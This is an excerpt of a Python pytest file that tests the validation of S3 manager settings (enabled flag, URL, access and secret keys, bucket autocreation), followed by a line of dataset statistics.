def test_disabled(self, test_s3_enabled: bool) -> None:
settings = OverhaveS3ManagerSettings(enabled=test_s3_enabled)
assert not settings.enabled
assert not settings.url
assert not settings.access_key
assert not settings.secret_key
@pytest.mark.parametrize("test_s3_enabled", [True])
def test_empty_enabled(self, test_s3_enabled: bool) -> None:
with pytest.raises(ValidationError):
OverhaveS3ManagerSettings(enabled=test_s3_enabled)
@pytest.mark.parametrize("test_s3_autocreate_buckets", [False, True], indirect=True)
@pytest.mark.parametrize("test_s3_enabled", [True], indirect=True)
def test_correct_enabled(
self,
test_s3_enabled: bool,
test_s3_autocreate_buckets: bool,
test_s3_manager_settings: OverhaveS3ManagerSettings,
) -> None:
assert test_s3_manager_settings.enabled == test_s3_enabled
assert test_s3_manager_settings.url
assert test_s3_manager_settings.access_key
assert test_s3_manager_settings.secret_key
assert test_s3_manager_settings.verify
assert test_s3_manager_settings.autocreate_buckets == test_s3_autocreate_buckets
| 39.72973 | 88 | 0.742857 | 1,358 | 0.92381 | 0 | 0 | 1,249 | 0.84966 | 0 | 0 | 137 | 0.093197 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.